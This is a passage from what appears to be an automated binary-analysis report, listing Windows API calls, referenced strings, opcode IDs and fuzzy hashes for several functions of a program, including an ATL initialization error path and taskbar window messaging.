                                                            • Opcode ID: 4819051df4b1ddf03a7c50dfa7eb9a30cd9a6f464e7c020b8c8037aec432ede2
                                                            • Instruction ID: 6b7efd2867d24e7e0fc66eb5d9d9009adb9a2651acf4ae5d659d6d10c8588070
                                                            • Instruction Fuzzy Hash: 84E0483125431927D21436547C43FED7BC49F05B61F21047AFB58655C38BD1655047A9
                                                            APIs
                                                              • Part of subcall function 00BBF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BC0D71,?,?,?,00BA100A), ref: 00BBF7CE
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,00BA100A), ref: 00BC0D75
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BA100A), ref: 00BC0D84
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BC0D7F
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 55579361-631824599
                                                            • Opcode ID: 541eec3c3950a83c81ee5518417edf0fe9e4b95f159b90501e4ec7371066d90f
                                                            • Instruction ID: 3f3d939859c9e541355aa851f0ef6552f2f7acc597836e14a7594ce26eb2f39e
                                                            • Instruction Fuzzy Hash: CDE06DB02203118BD730AFBDE84475A7BE0AB00740F0089BDE896C6661DBF5E4448BA1
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: LocalTime
                                                            • String ID: %.3d$X64
                                                            • API String ID: 481472006-1077770165
                                                            • Opcode ID: 501e193ee9940360151444d70f1f187a586631cd98d19956c7087a0082a23585
                                                            • Instruction ID: 39d7f991d3fa1c72ab7a9e2ec73536ded05fc7f78a6081a77cf8b06611b30a76
                                                            • Instruction Fuzzy Hash: B7D0127180810DEACB5097D0CCC59FEB3FDAB08301F5084E2FA06A3040E624C50C6BA1
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C3236C
                                                            • PostMessageW.USER32(00000000), ref: 00C32373
                                                              • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                            Strings
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 5108869078f9d821c55c8537865b52da60160ed0a42f64802545de3b3327d572
                                                            • Instruction ID: b9a5f651eb69dffafe87c400f04e90e2724db9ab1dfbe699f25054df89c3ee5a
                                                            • Instruction Fuzzy Hash: 5BD0C9323D53107AE664A771AC8FFCE76149B05B10F0049167745BA1D0C9A0A841DB54
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C3232C
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C3233F
                                                              • Part of subcall function 00C0E97B: Sleep.KERNEL32 ref: 00C0E9F3
                                                            Strings
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 1a78efdd52cefcc43d6ac2f82a909c1db27113e250340b4ce72f5ef73e865d0d
                                                            • Instruction ID: 9ce6da295f598b66a6f4c871d70598bb01ab8ef8654c614993856eb377c0622f
                                                            • Instruction Fuzzy Hash: 6FD0C9363A4310B6E664A771AC8FFCE7A149B00B10F0049167745BA1D0C9A0A841DB54